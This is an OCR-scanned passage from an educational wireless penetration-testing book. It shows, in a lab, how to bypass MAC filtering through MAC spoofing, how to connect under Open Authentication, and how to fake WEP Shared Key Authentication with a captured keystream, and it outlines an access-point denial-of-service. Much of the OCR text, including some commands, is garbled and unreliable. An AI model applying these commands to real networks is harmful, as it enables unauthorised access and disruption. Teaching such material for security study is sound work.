SETUP ADVANCED TOOLS STATUS SUPPORT 


VIRTUAL SERVER Helpful Hints... 
Wis V : = : e alist of I 
PORT FORWARDING The MAC (Media Access Controller) Address filter option is used to control network access euni : wee am SASF 
pm E based on the MAC Address of the network adapter. A MAC address is a unique ID assigned by either like to allow or deny 
LICATION RULES eithe allow or deny 
the manufacturer of the network adapter. This feature can be configured to ALLOW or DENY access to your network. 
NETWORK FILTER network/ Internet access. 


Computers that have 
ACCESS CONTROL Don't Save Settings obtained an IP address 

from the router's DHCP 
WEBSITE FILTER server will be in the DHCP 


Client List. Select a device 
24 -- MAC FILTERING RULES E 
INBOUND FILTER from the drop down menu, 


then dick the arrow to add 

Configure MAC Filtering below: E M E 

FIREWALL SETTINGS : a at device s address 
Turn MAC Filtering ON and ALLOW computers listed to access the network w to the list. 


ADVANCED WIRELESS 


MAC Address DHCP Client List ane ang apo bap reba 
WI-FI PROTECTED à; 


from the MAC Filtering list. 
SETUP 00:22: 19:e9:41:ac Computer Name adr —— 


ADVANCED NETWORK 60:fb:42:d5:e4:01 Computer Name 
Computer Name 
Computer Name 
Computer Name 


Computer Name 


Computer Name 
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2. Once MAC filtering is enabled only the allowed MAC address will be able to 
successfully authenticate with the access point. If we try to connect to the access 
point from a machine with a non-whitelisted MAC address, the connection will fail 


as shown next: 


jotabt:~-# iwconfig wlanO essid “Wireless Lab" channel 11 
ott: iwconfig 

no wireless extensions. 

no wireless extensions. 


no wireless extensions. 


IEEE 802.11bg ESSID: "Wireless Lab" 
Mode:Managed Frequency:2.462 GHz ee DUMMIES 
Tx-Power-27 dBm 

Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 

Power Management: off 


Link Quality:0 Signal level:0 Noise level:0 
Rx invalid nwid:0 Rx invalid crypt:6 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-Power-27 dBm 


Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 

Power Management: off 

Link Quality:8 Signal level:0 Noise level:60 

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:O 


otobtr-# a 





3. Behind the scenes, the access point is sending Authentication failure messages to 


the client. The packet trace would resemble the following: 


mond: Capturing - Wireshark 


Ele Edit Yew Go Capture Analyze Statistics Help 


«s .« 


2 we * «s. S. TE . J* < a 
1309 45.97121: 68: fb:42:05:04:901 D-Link d2:8e:25 


QJ, =U, TU, tC 


a), SN=71, FN=0, Flags 


1304 45.09 9:fb:42:d5;e4;91 D-Link d2:8e:25 IEEE 802 QoS Null function (No dete), SN«72, FN=0, Flags 
1305 46.096647 — 60:fb:42:d5:e4:01 D-Link d2:8e:25 IEEE 862 QoS Null function (No dats), 
1399 68.769076 D-Link d2:8e:25 Alfa 3e:bd:93 IEEE 802 Probe Response, SN=955, FNed, 


1404 62.62305 D-Link 02:86:25 Alfa Je:bd:93 IEEE 802 Authen 


" Clie 74 
" CNet 
ition, SN=9 4, 


FN=0, 


1406 62.617435  Alfà 3e:bd:93 D-Link d2:98e:25 IEEE 882 Authentication, SN-11, FN-9, 


141^ A? RAT1^6R M-i ink H?:Ra-*?&5 Alfa 3a-hd.65 TFzE AA? hithanticatinn &N-O7AR 


> Frane 1404 (66 bytes on wire, 66 bytes captured) 
> Radiotap Header v8, Length 32 
> JEEE 882.11 Authentication, Flags: ........ C 
" IEEE 892.11 wireless LAN management frane 
* Fixed peraneters (6 bytes) 
Authentication Algorithn: Open Systen (0) 
Authentication SEQ: OxOBOZ 


de: Unspeci fied 


3 Ug 40 C vo cU ca se G 93 UU 4 3] G2 Oe z. 
00 21 91 d2 Be 25 e0 3c 00 00 02 00 ER df 47 
9a 79 


Status of requested event (ian, m Packets: 22464 Displayed: 608 Marked: 0 
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4. in order to beat MAC filters, we can use ai r odump- ng to find the MAC addresses 
of clients connected to the access point. We can do this by issuing the commands 
alrodump-ng -c 11 -a --bssid 00:21:91: D2:8E: 25 mon0. By specifying 
thebssi d, we will only monitor the access point which is of interest to us. The - c 
11 sets the channel to 11 where the access point is. The - a ensures that in the client 
section of theai rodump- ng output, only clients associated and connected to an 
access point are shown. This will show us all the client MAC addresses associated 
with the access point: 


na root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


CH 11 ][ Elapsed: 20 s ][ 2011-01-09 09:15 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8E:25 -15 90 193 16 0 11 54e. OPN Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -3 0 3 Wireless Lab 





5. Once we find a whitelisted client's MAC address, we can spoof the MAC address of 
the client using the macchanger utility which ships with BackTrack. You can use the 
command macchanger -m 60: FB: 42: Db: E4: 01 wlan0 to get this done. The 
MAC address you specify with the - m option is the new spoofed MAC address for 
the wl an0 interface: 


root@bt: ~ - Shell - Konsole 





roota@bt:-# ifconfig wlanO down 
rootebt:-4 macchanger -m 60:FB:42:D5:E4:01 wlanO 
Current MAC: 00:c0:ca:3e:bd:93 (Alfa, Inc.) 
60:fb:42:d5:e4:01 (unknown) 
rootabt:-# ifconfig wlanO up 
root@bt :~# 
root@bt:-# iwconfig wlanO essid "Wireless Lab" channel 11 
rootabt:-# iwconfig wlanO 
wlanO IEEE 802.11bg ESSID:"Wireless Lab" 
Mode:Managed Frequency:2.462 GHz AEAEE EO E H: EP, 
Bit Rate-1 Mb/s  Tx-Power-27 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: off 
Link Quality=70/70 Signal level=-15 dBm 
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


rootebt:~# B 
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6. As you can clearly see, we are now able to connect to the access point after spoofing 
the MAC address of a whitelisted client. 








* FEV OA ae T F3 
We monitored the air using a! rodump- ng and found the MAC address of legitimate clients 
connected to the wireless network. We then used the macchnager utility to change our 
wireless card's MAC address to match the client's. This fooled the access point into believing 
that we are the legitimate client, and it allowed us access to its wireless network. 





You are encouraged to explore the different options of the ai rodump- ng utility by going 
through the documentation on their website: http://www. ai rcrack-ng.org/ doku. 
php?idzairodump-ng. 
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The term Open Authentication is almost a misnomer, as it actually provides no 
authentication at all. When an access point is configured to use Open Authentication, it will 
successfully authenticate all clients which connect to it. 


We will now do an exercise to authenticate and connect to an access point using Open 
Authentication. 


Time for action — bypassing Open Authentication 


Let us now look at how to bypass Open Authentication: 





1. Wewill first set our lab access point Wireless Lab to use Open Authentication. On 
my access point this is simply done by setting Security Mode to None: 


Product Page: DIR-615 


SETUP ADVANCED TOOLS STATUS 


INTERNET 
WIRELESS SETTINGS Use this section to configure the wireless settings for your D-Link Router. Please note that 
changes made on this section may also need to be duplicated on your Wireless Client. 


oon av Sens 


WIRELESS NETWORK SETTINGS 


Always w 

Wireless Network Name: Wireless Lab {Also called the SSID) 
802.11 Mode: Mixed 802.11n, 802.11g and 802.11b w 
Enable Auto Channel Scan : | | 

Wireless Channel : 
Transmission Rate : 
Channel Width : 
Visibility Status : 


NETWORK SETTINGS 


Enable Wireless : 


2.462 GHz -CH 11 v 

Best (automatic) 

20 MHz X 
(Q9 visible © Invisible 


-» (Mbit/s) 


WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 


require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode : None 


WIRELESS 


Hardware Version: B2 


Firmware Version: 2.23 


SUPPORT 


Helpful Hints... 


Changing your Wireless 
Network Name is the first 
step in securing your 
wireless network. Change 
it to a familiar name that 
does not contain any 
personal information. 


Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your wireless 
network to operate on. 


Enabling Hidden Mode is 


option enabled, no wireless 
will be able to see 


e. For your 
W vices to connect 
to your router, you will 
need to manually enter the 
Wireless Network Name on 
each device. 


If you have enabled 
Wireless Security, make 
sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on any wireless 
device that you connect to 
your wireless network. 
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2. We then connect to this access point using the commandi wconfig wlan0 essid 


'Wireless 
connected to the access point: 


— 
» (3) 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





root@bt:~# iwconfig wlanO essid "Wireless Lab" 
root@bt:~# iwconfig wlanO 
wlanO IEEE 802.11bg ESSID:"Wireless Lab" 


Mode:Managed Frequency:2.462 GHz Access Point: 00:21:91:D2:8E:25 


Bit Rate-1 Mb/s 
Retry min limit:7 
Encryption key:off 


Tx-Power=27 dBm 


RTS thr:off Fragment thr:off 


Power Management: off 
Link Quality-70/70 Signal level=-15 dBm 
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 


Tx excessive retries:0 Invalid misc:0 
root(bt :~# 


root(bt :~# 
rootabt:-s J 


3. 
through Open Authentication. 


Missed beacon:0 





Lab" and verify that the connection has succeeded and that we are 


Note that we did not have to supply any username / password / passphrase to get 


Bypassing WLAN Authentication 
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This is probably the simplest hack so far. As you saw, it was not trivial to break Open 
Authentication and connect to the access point. 
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Shared Key Authentication uses a shared secret such as the WEP key to authenticate the 
client. The exact exchange of information is illustrated next (taken from ht t p: / / www. 


netgear. com): 
: Access 
"e Client Poi 
IT oint 


1) Authentication Request 


" 2) AP sends Challenge Text 


3) Challenge Response 





The wireless client sends an authentication request to the access point, which responds 
back with a challenge. The client now needs to encrypt this challenge with the shared 

key and send it back to the access point, which decrypts this to check if it can recover the 
original challenge text. If it succeeds, the client successfully authenticates, else it sends an 
authentication failed message. 


The security problem here is that an attacker passively listening to this entire communication 
by sniffing the air has access to both the plain text challenge and the encrypted challenge. He 
can apply the XOR operation to retrieve the keystream. This keystream can be used to encrypt 
any future challenge sent by the access point without needing to know the actual key. 


In this exercise, we will learn how to sniff the air to retrieve the challenge and the encrypted 
challenge, retrieve the keystream, and use it to authenticate to the access point without 
needing the shared key. 


Time for action - bypassing Shared Authentication 
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Bypassing Shared Authentication is a bit more challenging than previous exercises, so follow 
the steps carefully. 


1. Let us first set up Shared Authentication for our Wireless Lab network. | have done 
this on my access point by setting the Security Mode as WEP and Authentication as 
Shared Key: 


WIRELESS 


WIRELESS NETWORK SETTINGS 





Enable Wireless : [7] Aways ~ 


Wireless Network Name : Wireless Lab (Also called the SSID) 
802.11 Mode: Mixed 802.11n, 802.11g and 802.11b w 

Enable Auto Channel Scan: | | 

Wireless Channel : 

Transmission Rate : 

Channel Width : 

Visibility Status : 





2.462 GHz -CH 11 w 


Best (automatic) ~ (Mbit/s) 


20 MHz Y 
(9 visible © Invisible 


WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 
require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: WEP 


WEP is the wireless encryption standard. To use it you must enter the same key(s) into the 
router and the wireless stations. For 64 bit keys you must enter 10 hex digits into each key box. 
For 128 bit keys you must enter 26 hex digits into each key box. A hex digit is either a number 
from 0 to 9 or a letter from A to F. For the most secure use of WEP set the authentication type 
to "Shared Key" when WEP is enabled. 


You may also enter any text string into a WEP key box, in which case it will be converted into a 
hexadecimal key using the ASCII values of the characters. A maximum of 5 text characters can 
be entered for 64 bit keys, and a maximum of 13 characters for 128 bit keys. 


If you choose the WEP security option this device will ONLY operate in Legacy Wireless mode 
(802.11B/G). This means you will NOT get 11N performance due to the fact that WEP is not 
supported by Draft 11N specification. 


WEP Key Length : 
WEP Key 1: 

WEP Key 2: 

WEP Key 3: 

WEP Key 4: 
Default WEP Key : 
Authentication : 


64 bit (10 hex digits) ~ (length applies to all keys) 
eoecccccce 
eeccccccce 
eovcccccce 
eocccccece 


WEP Key1 v 
Shared Key v 


Copyright © 2004-2007 D-Link Systems, Inc. 


Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your wireless 
network to operate on. 


Enabling Hidden Mode is 
another way to secure 
your network. With this 
option enabled, no wireless 
cients will be able to see 
your wireless network 
when they scan to see 
what's available. For your 
wireless devices to connect 
to your router, you will 
need to manually enter the 
Wireless Network Name on 
each device. 


If you have enabled 
Wireless Security, make 
sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on any wireless 
device that you connect to 
your wireless network. 
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2. Letus now connect a legitimate client to this network using the shared key we have 
set in step 1. 


3. In order to bypass Shared Key Authentication, we will first start sniffing packets 
between the access point and its clients. However, we would also like to log the 
entire shared authentication exchange. To do this we useai rodump- ng using the 
commandairodump-ng mond -c 11 --bssid 00:21:91: D2:8E: 25 -w 
keystream. The- w option which is new here, requestsai rodump- ng to store the 
packets in a file whose name is prefixed with the word "keystream". On a side note, 
it might be a good idea to store different sessions of packet captures in different 
files. This allows you to analyze them long after the trace has been collected: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 2 mins ][ 2011-01-09 11:45 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8bE:25 -14 90 1174 4 0 11 54e. WEP WEP Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 





4, \Necan either wait for a legitimate client to connect to the access point or force 
a reconnect using the Deauthentication technique used previously. Once a client 
connects and the shared key authentication succeeds, ai rodump- ng will capture 
this exchange automatically by sniffing the air. An indication that the capture has 
succeeded is when the AUTH column reads SKA that is, Shared Key Authentication as 
shown next: 


E root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 4 mins ][ 2011-01-09 11:47 ][ 140 bytes keystream: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -21 96 2217 7 0 11 54e. WEP WEP E wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 
00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -3 0 4 Wireless Lab 
AC 

root@bt:-# J 
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5. Thecapturedkeystreamis stored in a file prefixed with the word keystreamin 
the current directory. In my case the name of the file iskeystream-01-00- 21- 
91- D2- 8E- 25. xor asshown next: 


root@bt: ~ - Shell - Konsole 


keystream-01.cap keystream-01.kismet.netxml 
keystream-01.csv 
keystream-01.kismet.csv 





6. In order to fake a shared key authentication, we will use the ai r epl ay- ng 
tool. We run the commandaireplay-ng -1 0 -e Wireless Lab -y 
keystream-01-00-21-91- D2- 8E-25. xor -a 00:21:91: D2:8bE:25 -h 
aa:aa:aa:aa:aa:aa monQ.airepl ay-ng uses the keystream we retrieved in 
step 5 and tries to authenticate with the access point with SSID Wi rel ess Lab 
and MAC address 00: 21: 91: D2: 8E: 25 and uses an arbitrary client MAC address 
aa:aa:aa:aa:aa:aa. Fire up Wireshark and sniff all packets of interest by applying 
afilterwl an. addr == aa:aa:aa:aa: aa: aa: 


:-# aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a 00:21:91:02:8E:25 -h aa:aa:aa:aa:aa:aa mond 





7. aireplay-ng lets us know if the authentication succeeded or not in the output: 


recte@bt: — - shell - Konsole 
Session Edit View Bookmarks Settings Heip 
t:=-# aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a 00:21:91:D2:8E:25 -h aa:aa:aa:aa:aa:aa mond 
The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h). 
ifconfig mon8 hw ether AA:AA:AA:AA:AA:AA 
:51 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 


:*51 
$52 
:52 [ACK] 


:52 Authentication 2/2 successful 
:52 Sending Association Request [ACK] 
:53 Association successful :-) (AID: 1) 





mock 
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8. Wecan verify the same using Wireshark. You should see a trace as shown next on 
the Wireshark screen: 


(untitled) - Wireshark 
ple Edi view Go Capture Analyze Statistics Help 


Bae cuxcaulesoTli leg «eer as 


[vf] Blter: (wlan. addr aataa:aa:aaliaa:aa) = »| db Expression... i clear af Apply 


wo. [time source sf etination Sf Pratocal | 
476433 aaiaaiaa:aa:aa:aa D-Link d2:8e;:25 802 Authentication, SN-0, FN=0, Flags- 
.485326 . D-Link, d2:8e:25 aaiaaiaaiaaiaaiaa 802 Authentication, SN=2950, FN=0, Flags-... 
476454  aa:aa:aa:aa:aa:aa D-Link d2:8e:25 802 Authentication, SN=0, FN=0, Flags- 
.487057 . D-Link d2:8e: aa:aa:aa:aa:aa:aa 802 Authentication, SN=2950, FN=0, Flags=... 
488037 D-Link_d2:8e: aa:aa:aa:aa:aa:aa 802 Authentication, SN=2950, FN=0, Flags=... 
490002 . D-Link d2:8e: BHBH8:BHH:BBH:HH:BHH:HBH 802 Authentication, SN=2950, FN-0, Flags-... 
.492189 J D-Link d2:8e: BHBH8:BHH:BBH:HH:BHH:BHBH 802 Authentication, SN=2950, FN=0, Flags-... 
„493060 . D-Link, d2:8e: a8: AA i AAi AAi AAAA 802 Authentication, SN=2950, FN=0, Flags-...| 
495134 D-Link, d2:8e: ;da:2a:3a:3a3: 802 Authentication, 5N-2950, FN-0, Flags-... 
497262 — D-Link, d2:8e: ;4a:2a:3a:3a3: 802 Authentication, SN=2950, FN=0, Flags-... 
.498987 D-Link d2:8e: ;aa:aa:aa:aa: 802 Authentication, SN=2950, FN=0, Flags=... 
501014 D-Link d2:8e: |ad:da:aa:aa: 802 Authentication, SN=2950, FNzO, Flags=... 
502062 D-Link d2:8e: 'ad:da:da:ga: 802 Authentication, SN=2950, FN=0, Flagss.... 
| | n) 
* Frame 611 (70 bytes on wire, 7O bytes captured) 
* Radiotap Header vO, Length 12 
* IEEE 802.11 Association Request, Flags: 
* IEEE 802.11 wireless LAN management frame 
* Fixed parameters (4 bytes) 
t Capability Information: 0x0431 
Listen Interval: 0x0064 
" Tagged parameters (30 bytes) 
7 SSID parameter set: "Wireless Lab" 
Tag Number: © (SSID parameter set) 


00 GO Oc OO 04 8D 00 OO OZ GO 18 OO OO OO 3a ül 
00 21 91 d2 8e 25 aa aa aa aa aa aa 00 21 91 dż 
Be 25 60 00 31 04 64 600 OO Oc 57 69 72 65 Ge 65 
File: *AmpjetherkxxxkDoAble8" 550 E. ] Packets: 2896 Displayed: 105 Marked: 0 Dropped: 0 ; Profile: Ceefaull 





9. The first packet is the authentication request sent by the ai replay- ng tool to the 
access point: 


AMM 
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(Uintithed) - Wireshark 
Ble Edit ‘iw Go Capture Analyze Statistics Help 
Baaaü ciuxeuleeserTzlm9eaeemnwxsiz SB 
[V Eier: | (wlan.eddr == aoraatearaazeataa) >| 3f Expression... | i& clear] «f Apply 
uo. Jome exa [Desaon [ecto | 
559 28.476433 aaiaa:aaiaa:aa:aa “D-Link d2:8e:25 IEEE 802 Authentication, SN=0, FN=0, Flags=..... J 
56128,485326 D-Link d2:8e:25 323:22:2323:22:232:22 IEEE 802 Authentication, 5N=2950, FN=0, Flagss.,.. 
| n 
t Frame 559 (42 bytes on wire, 42 bytes captured) 
è Radiotap Header vO, Length 12 
^ IEEE 802.11 Authentication, Flags: .......; 
= IEEE 802.11 wireless LAN management frame 
* Fixed parameters (6 bytes) 
Authentication Algorithm: Shared key (1) 
Authentication SEQ: 0x0001 
Status code: Successful (026000) 


600 60 00 Ge 00 04 BD 00 OD OF 00 18 OO bG 0G 3a 01 
010 O60 21 91 d2 8e 25 aa aa aa aa aa aa OG 21 91 d2 
O20 Be 25 00 06 Ql OG Ql OO OO GO 


[rile *nemp?ethenxxknalua" 550 K :] Packets: 2098 Displayed: 105 Marked: 0 Gropp : Prohle: Delèu 





10. The second packet consists of the access point sending the client a challenge text 
as shown: 


(Untitied) - Wiroahark 


Gaga Saxe cesanFs SR aaah eMsex se 
[wlan addr == aataa!aatantaat aa} ] + Exprenman., 7 


559 28.476433 3 aa:aa:aa:aa:2a:aa3 D-Link d2:88:25 IEEE 802 Authentication, SN=0, FN=0, Flagss...... 
561 28.485326 D-Link d2@:8e:25 88:8a8:88:aà:aa:aa IEEE 802 Authentication, SN=2950, FN=0, Flagss.. 


* Frame 561 (196 bytes on wire, 196 bytes captured) 

+ Radiotap Header vO, Length 32 

* IEEE 802.11 Authentication, Flags: ........C 

* IEEE 802.11 wireless LAN management frame 

* Fixed parameters (5 bytes] 

Authentication Algorithm: Shared key (1) 
Authentication SEQ: axo002 
Status code: Successful (6x6000) 


* Tagged parameters [130 bytes) 
= Challenge text 
Tag Number: 16 (Challenge text) 
Tag Length: 128 
Tag interpretation: Challenge text: F4ESEEB4d487B55C7F776413058484D4CG6BBG6A5SCEADGSEB6. . . 


DOGG GO 66 20 06 2f 48 66 OD Ib 58 dc dd 61 66 ğü OO 
2010 10 02 Se 09 ağ 00 T7 01 GB 00 GO 00 g0 OO OD GO 
D020 bO OG 40 Ol aa aa aa aa aa aa GO 21 91 d2 Be 25 


fle: *itrnpiethenoookoAlye" 550 E-n Packets: 2000 Displayed; 105 Marked: o Dropped: 9 jPralle: Default 
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11. 


In the third packet, the tool sends the encrypted challenge to the access point: 


(Untitled) - Wireshark 


fle Edt yew Qo Capture Analyze Gratistics Help 

E wo Ow eased C.+eeF2L OR QA BMSe B 
18a:aa:aa] C w| 4e Expression & Clear] af Apply 

eS a — enr — pee [— ER 


589 28.833090 aa:aa:iaa:aa:aa:iaa 7 ET ET Be: Er IEEE 802 Authentication, SN= 3, FND. Flag 
591 28.839319 D-Link_d2:8e:25 aa:aa:aa:aa:aa:aa IEEE 802 Authentication, SN=2955, FN=0, Minga: 4$ 


ER ÉL 


Frame 589 (181 bytes on wire, 181 bytes captured) 
* Radiotap Header vO, Length 13 
* IEEE 802.11 Authentication, Flags: .p...... 
* Data (136 bytes) 
Data: 5A4542F14ACAA021BC046E2B7DE58962B476444720A4FD7BD. . . 


eleleemmoG OO Od 06 64 80 02 60 O62 60 61 OO 66 bO 40 3 i 
0010 JPM OO 21 91 d2 Se 25 aa aa aa aa aa aa 00 21 91 if . 
ltvitmeed?2 Be 25 30 00 67 92 Ge OO 5a a5 42 fl ac aa 0 ..80.g.n .Z.B. 


Fearne (frarne), 181 bytes [Packets 2096 Displayed: 105 Marked: 0 Cropped: 0 [Prchle Delauh 





12. Asaireplay-ng used the derivedkeystreamfor encryption, the authentication 





succeeds and the access point sends a success message in the fourth packet: 


IIT E - Wireshark 
Bie Edt Yew Go Capture Analyze Statistics Help 


Basea Saxce .eoeF2 OS 28 WEM SB 
(emer. Malan sadder CH ————— T e| + prenion. |Æ cher df soc] 


me. [nme source timation: 


591 28,839319 D-Link d?:8e:25 reEUPUESES E 802 Authentication, SN=2955, FN=0, Flat 


|^ Frame 591 (66 bytes on wire, 66 bytes captured) 

* Radiotap Header vO, Length 32 

* IEEE 802.11 Authentication, Flags: ........C 

- IEEE 802.11 wireless LAN management frame 

* Fixed parameters (6 bytes) 

Authentication Algorithm: Shared key (1) 
Authentication SEQ: 6x0004 
Status code: Successful (üxB8800) 


aoao 00 20 66 2f 48 66 O0 39 c4 el 4d G1 GO Gü G0 - 
6810 10 02 Se 09 af GO fl Ol 66 00 GO 60 00 00 00 GO 
020 b GG 49 Ol aa aa aa aa aa aa GO 21 91 d2 Be 25 


[ris !rmplethedsonodeonAl at tnis 
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13. After authentication succeeds, the tool fakes an association with the access point, 
which succeeds as well: 


(Untitled) - Wireshark 


fe Edi Yew Go Capture jAnahre Statistics Help 
ei a ma li Bux 9e93TXlmm &«wE wf 3 


P niter: [iwlar addr == aa:asalaalaalaslda) Expression... gh clear «Jf Apply| 


ae a e 


604 28,856307 . D-Link d2:8e:25 aa:aa:aa:aa:aa:aa IEEE 802 Authentication, SN=2955, FN=0, Flagss... 
605 28,857311 D-Link d2:8e:25 aa:aa:aa:aa:aa:aa IEEE 802 Authentication, SN=2955, FN=0, Flags-... 
611 29.076796 aa:aaiaa:aa:aaiaa D-Link d2:8e:25 IEEE 802 Association Request. SN=6, FN=0, Flags= 

613 29.100485 O-Link_d2:8e:25 aa:aa:aa:aa:aa:aa IEEE 802 Association Response, SN=2958, FN=0, Fle 
615 28.076808 3 aa:aa:aa:aa:aa:aa D-Link d2:88e:25 IEEE 802 Association Request, SN=6, FN=0, Flags=. 
616 29.102506 — D-Link d2:8e:25 daisgd:dgas:dd:agdg:a IEEE 802 Association Response, SN=2958, FN=0, Fle 
617 29.104437 . D-Link, d2:8e:25 aa:aa:aa:aa:aa:aa IEEE 802 Association Response, SN=2958, FN=0, Fle 


fa = AAP APS A i dal 2 MSs 2 AE iy A T ala a YET OY Teer AA Aem mcm akian M hl ae PELi MI a 


= 2] 


t Frame 611 (70 bytes on wire, 70 bytes captured) 
* Radiotap Header vO, Length 12 
» IEEE 802.11 Association Request, Flags: ..... 


* IEEE 802.11 wireless LAN management frame 
* Fixed parameters (4 bytes) 
t Capability Information: Ox0431 
Listen Interval: Gxz0064 
* Tagged parameters (30 bytes) 
* SSID parameter set: "Wireless Lab" 
Tag Number: @ (SSID parameter set) 
Tag length: 12 
Tag interpretation: Wireless Lab 
7 Supported Rates: 1.0 2,0 5.5 11.0 
Tag Number: 1 (Supported Rates) 
Tag length: 4 
0000 GÖ OO Oc OO O4 80 OO OO OF 00 18 00 OO 00 3a 01 


0010 GO 21 91 d2 Sa 25 aa aa aa aa aa aa OO 21 91 d2 
0020 ge 25 60 QÜ 31 04 64 OO OO Ge 57 69 72 65 Ge 65 


Ale: *"mppethenccxxkoalhs" 5580 K... 1 Packets: 2896 pesplaye : 105 Marked: 0 Dropped: à Profile: Gofal 





14. |f you check the wireless logs in your access point's administrative interface, you 
should now see a wireless client with MAC address AA:AA:AA:AA:AA:AA connected: 


Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


SETUP ADVANCED TOOLS STATUS SUPPORT 


DEVICE INFO Helpful Hints... 


LOGS : : : : : : This is a list of all wireless 
loss Use this option to view the wireless clients that are connected to your wireless router. dients that are curreniiy 
STATISTICS connected to your wireless 


router. 


INTERNET SESSIONS NUMBER OF WIRELESS CLIENTS: 1 


Mode Rate Signal (%) 


54 100 


WIRELESS 
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X 35999 AV? TES 
We were successful in deriving the keyst r eam from a shared authentication exchange, and 
we used it to fake an authentication to the access point. 














Access points have a maximum client count after which they start refusing connections. By 
writing a simple wrapper over al repl ay- ng, it is possible to automate and send hundreds 
of connection requests from random MAC addresses to the access point. This would end up 
filling the internal tables and once the maximum client count is reached, the access point 
would stop accepting new connections. This is typically what is called a Denial of Service 
(DoS) attack and can force the router to reboot or make it dysfunctional. This could lead to 
all the wireless clients being disconnected and being unable to use the authorized network. 


Check if you can verify this in your lab! 


1. Youcan force a wireless client to re-connect to the access point by? 
a. Sending a Deauthentication packet 
b. Rebooting the client 
c. Rebooting the access point 
d. Allofthe above 


2. Open Authentication: 
a. Provides decent security 
b. No security 
c. Requires use of encryption 


d. None ofthe above 


3. Breaking Shared Key Authentication works by? 
a. Deriving thekeystream from the packets 
b. Deriving the encryption key 
c. Sending Deauthentication packets to the access point 


d. Rebooting the access point 


AHR 
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OOO 


In this chapter, we have learnt the following about WLAN authentication: 


* 


Hidden SSIDs is a security through obscurity feature, which is relatively simple 
to beat. 


MAC address filters do not provide any security as MAC addresses can be sniffed 
from the air from the wireless packets. This is possible because the MAC addresses 
are unencrypted in the packet. 


Open Authentication provides no real authentication at all. 


Shared Key Authentication is bit tricky to beat but with the help of the right tools we 
can derive the store the keystream, using which it is possible to answer all future 
challenges sent by the access point. The result is that we can authenticate without 
needing to know the actual key. 


In the next chapter, we will look at different WLAN encryption mechanisms—WEP, 
WPA, and WPA2, and look at the insecurities which plague them. 


NCS 





* kor 4ST CM A 


"640 K is more memory than anyone will ever need." 
Bill Gates, Founder, Microsoft 
m 
Even with the best of intentions, the future is always unpredictable. The 
WLAN committee designed WEP and then WPA to be fool proof encryption 


mechanisms but over time, both these mechanism had flaws, which have been 
widely publicized and exploited in the real world. 


WLAN encryption mechanisms have had a long history of being vulnerable to cryptographic 
attacks. It started with WEP in early 2000, which eventually was broken entirely. In recent 
times, attacks are slowly targeting WPA. Even though there is no public attack available 
currently to break WPA in all general conditions, there are attacks which are feasible under 
special circumstances. 


In this chapter, we shall look at the following: 


€ Different encryption schemas in WLANs 
€ Cracking WEP encryption 
€ Cracking WPA encryption 


X RO A VE 





€ Wired Equivalent Privacy (WEP) 
€ WiFi Protected Access (WPA) 
€ WiFi Protection Access v2 (WPAv2) 


WLAN Encryption Flaws 


Here, we will look at each of these encryption protocols and demonstrate various attacks 
against them. 


* oc OVE 


The WEP protocol was known to be flawed as early as 2000, but surprisingly it is still 
continuing to be used and the access points still ship with WEP-enabled capabilities. 


There are many cryptographic weaknesses in WEP and they were discovered by Walker, 
Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a 

cryptographic standpoint is beyond the scope of this book, as it involves understanding 
complex math. 






Let us now first set up WEP in our test lab and see how we can break it. 





Time for action - cracking WEP 


Follow the given instructions to get started: 


1. Letus first connect to our access point Wireless Lab and go to the settings area that 
deals with Wireless Encryption mechanisms: 


Product Page: DIR-615 Hardware Verson: 82 Frirrware Version: 2.23 


| ADVANCED STATUS SUPPORT 
=S 


Helpful Hints 
Char Ou Wireless 
Use thi; section to configure the wireless settings for your D-Link Router. Please note that ecard ata is iain t 
changes made on this section may also need to be duplicated on your Wireless Clent. — your 

2 | wreless network. Change 
Save Settings Don't Save Settings | it to a fandiar name that 
dors not contain any 
